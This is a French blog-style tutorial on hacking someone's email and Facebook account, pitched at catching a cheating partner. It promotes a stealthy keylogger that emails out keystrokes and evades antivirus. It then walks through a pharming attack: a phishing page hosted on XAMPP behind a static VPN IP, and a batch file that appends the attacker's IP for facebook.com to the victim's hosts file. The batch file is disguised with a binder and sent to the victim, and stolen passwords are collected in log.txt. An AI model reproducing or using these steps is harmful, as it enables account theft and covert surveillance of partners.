Je sais que la plupart d'entre vous demandez de savoir comment pirater un compte e-mail? Pour attraper un conjoint de fraude, petite amie / petit ami,
regler un compte en ayant accès à leurs comptes de messagerie.
Alors, lisez la suite pour savoir les moyens réels et le travail de Hacker a pirater n'importe quel email et exposer la vérité derrière les mensonges.
Est-il possible de pirater un E-mail ?
Oui ! En fait, presque tout peut être piraté. Mais avant il faut apprendre les moyens
réels de pirater e-mail, voici les choses que vous devriez être au courant.
1. Il n'ya aucun logiciel prêt à l'emploi qui peut pirater e-mails
et vous obtenez le mot de passe juste avec un clic d'un bouton. Donc,
si vous venez en face tout site Web qui prétend vendre ces logiciels, je vous conseille de ne pas leur faire confiance.
2. Ne faites jamais confiance a un service de messagerie piratage
qui prétend pirater n'importe quel email pour seulement 100 $ ou 200 $.
La plupart d'entre eux ne sont plus qu'une escroquerie.
3. Avec mon expérience de plus de 3 ans dans le domaine de Hacking
et de sécurité, je peux vous dire qu'il existe seulement 2 méthodes
infaillibles pour le Hacking de courrier électronique .
Toutes les autres méthodes sont tout simplement escroquerie
ou ne fonctionnent pas.
Ce qui suit sont les deux seules méthodes de travail
Un keylogger (littéralement enregistreur de touches)
est un dispositif chargé d'enregistrer les frappes de touches
du clavier et de les enregistrer, à l'insu de l'utilisateur. Il s'agit
donc d'un dispositif d'espionnage.
Certains keyloggers sont capables d'enregistrer les URL visitées,
les courriers électroniques consultés ou envoyés,
Mot de passe,les fichiers ouverts, capture d'ecran, voire
de créer une vidéo retraçant toute l'activité de l'ordinateur !
Dans la mesure où les keyloggers enregistrent toutes les frappes
de clavier, ils peuvent servir pour récupérer les mots de passe des utilisateurs !
Les principales fonctions:
Enregiste les touches frappées au clavier – y compris toutes les touches accentuées
Choix de l’application à surveiller (Word, Firefox, IE etc.)
Enregistre le son capté par le microphone si branché (les silences sont ignorés)
Transmet en douce les données captées par EMAIL, ou FTP, ou WEB
(si un serveur st disponible)
L’application est construite par l’usager: il lui donne un nom, une icône,
un nom pour le fichier log caché et crypté, il défini d’autres
caractéristiques essentielles.
L’application (minuscule, moins de 20ko)
peut être injectée par son propriétaire dans tout autre programme
exécutable (par exemple Word, Excel, Firefox, MSN etc.)
et démarrera automatiquement au lancement de ce programme – ou de Windows.
L’application passe inaperçue auprès des antivirus et utilisateur !!!
Phishing 2013
Phishing est un autre type avancé de Phishing attaque, , Dans cet article je vais vous expliquer comment vous pouvez utiliser cette méthode pour pirater Facebook , les comptes Gmail.
Cette attaque de phishing est un peu avancé et si vous êtes un débutant, je vous recommande de lire les articles suivants en premier
Concept Behind The Hack:
Fichier hosts est un fichier informatique utilisé dans un système d'exploitation pour mapper les noms d'hôtes en adresses IP. Fichier hôte utilisé pour jouer un rôle important avant le Domain Name System (DNS) est entré en existence. Un fichier hosts contrôle fondamentalement la façon dont votre navigateur trouve sites Web.
Vous pouvez utiliser le fichier hôte à mapper n'importe quel mot ou un domaine à une adresse IP ou à un autre domaine. Par exemple, si nous ajoutons
74.125.236.84 www.facebook.com
Pour le fichier host ce qui va arriver, c'est que lorsque vous tapez dans votre navigateur Facebook.com il va ouvrir google.com au lieu de facebook.com c'est parce que (74.125.236.84) est Ip Google, donc la navigation faut-il aveuglément Donc, si un attaquant a ajoute son adresse IP (dans un adresse URL) Le Victime va être redirigé vers le site de phishing
Ce qui rend cette attaque est un tel succès que la victime ne rend pas compte du changement de lien .
Ce que les hackers Ne vous enseignez pas ?
De nos jours tout le monde a une adresse IP dynamique (IP change à chaque fois que vous redémarrez votre Pc )
Maintenant, tous les ordinateurs sont connecter derrière un routeur, donc nous devons porter en avant notre serveur Web afin d'y accéder. C'est un peu etrange pour les débutants
Mais dans ce tutoriel je vais vous expliquer comment vous pouvez venir à bout
0-
Nous avons Besoin d'un VPN statique, Avec un VPN, vous aurez une adresse IP statique
Démonstration
Les choses que vous désirez: -
1. Phisher - Vous pouvez télécharger Facebook Phisher la page à partir d'ici
(J'ai ajouté une page supplémentaire pour le rendre plus réaliste, la victime recevra un message indiquant que Facebook est bloqué par votre FAI)
2. Serveur Web - Vous pouvez utiliser wamp ou xammp, je vous recommand d'utiliser xammp, j'ai écrit un tutoriel sur comment vous pouvez installer, à utiliser Xammp.
3. Un VPN statique - Je vais utiliser proXPN VPN pour ce tutoriel, mais je vous recommande d'utiliser Forte VPN ouvert car il est très stable, vous pouvez letélécharger à partir d'ici
Procédure: -
1. D'abord télécharger et installer xampp sur votre PC, Démarrer les services
Apache et Msql
2. Télécharger la page Facebook Phisher partir du lien donné ci-dessus, Placez tout son contenu dans le dossier docs ht qui devrait être sous Xammp .
3. Installez ProXPN VPN ou tout autre VPN statique, je vous recommande d'utiliser le VPN Fort comme il est très stable et vous donne une adresse IP statique Une fois que vous installer et l'exécuter, vous obtiendrez une adresse IP statique (vpn)
(pour regarder votre Ip : http://www.whatismyip.com/)
4. Maintenant, nous devons remplacer un texte dans le fichier Host victimes qui est dans C: \ windows \ system32 \ drivers \ etc, vous pouvez le faire en plusieurs façons, soit en utilisant une archive SFX ouun fichier batch . pour ce tutoriel, nous allons utiliser un fichier batch
ouvre un fichier ave blog note et taper :
@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Remplacer "172.X.XX.XX" avec votre adresse IP (VPN) , enfin enregistrer queEnregistrez-le sous: cequevousvoulez.bat
5. Maintenant, pour éviter les soupçons, vous pouvez lier le fichier batch avec un Binders .
6. Maintenant envoyer le fichier par e-mail ou Uploader le fichier sur un site et demander à la victime de télécharger le fichier, Après le téléchargement et clique sur le fichier, son page d'accueil sera remplacé, Alors maintenant, chaque fois que la victime entre dans facebook.com Il va être redirigé vers notre page Phisher, mais l'URL restera : www.facebook.com
Enfin Pour voir les informations d'identification de toutes les victimes et mot de passe ouvert récemment un fichier a ete créé log.txt qui est sous ht docs dossier
Bonne Hacking and Happy New Year !!
Vous pouvez laisser un commentaire en cas de souci !!!